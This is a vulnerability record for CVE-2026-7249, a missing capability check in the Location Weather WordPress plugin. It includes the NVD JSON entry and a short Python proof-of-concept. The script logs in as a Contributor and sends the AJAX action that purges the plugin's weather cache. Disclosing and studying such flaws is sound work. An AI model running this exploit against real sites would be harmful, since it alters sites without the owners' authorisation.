CVE-2026-7249

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" login_url = "http://example.com/wp-login.php" username = "contributor" password = "password" session = requests.Session() # Step 1: Authenticate as a low-privileged user (e.g., Contributor) login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": target_url } session.post(login_url, data=login_data) # Step 2: Fetch the nonce (splw_nonce) exposed via wp_localize_script # In a real scenario, this might be scraped from a page source or response body # Assuming the nonce is '12345' for demonstration nonce = "extracted_nonce_value" # Step 3: Exploit - clean transients exploit_data = { "action": "lwp_clean_weather_transients", "security": nonce } response = session.post(target_url, data=exploit_data) if response.status_code == 200: print("Exploit successful! Cache cleared.") else: print("Exploit failed.")

{"cve": {"id": "CVE-2026-7249", "sourceIdentifier": "[email protected]", "published": "2026-05-22T05:16:27.623", "lastModified": "2026-05-22T05:16:27.623", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Location Weather plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the `splw_update_block_options()` and `lwp_clean_weather_transients()` functions in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to disable all weather blocks and purge all weather cache transients. The nonce required for these actions is exposed to all authenticated users via `wp_localize_script()` on the `init` hook."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L331", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L332", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/location-weather/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d472011d-1623-4791-9d56-715d90fe0469?source=cve", "source": "[email protected]"}]}}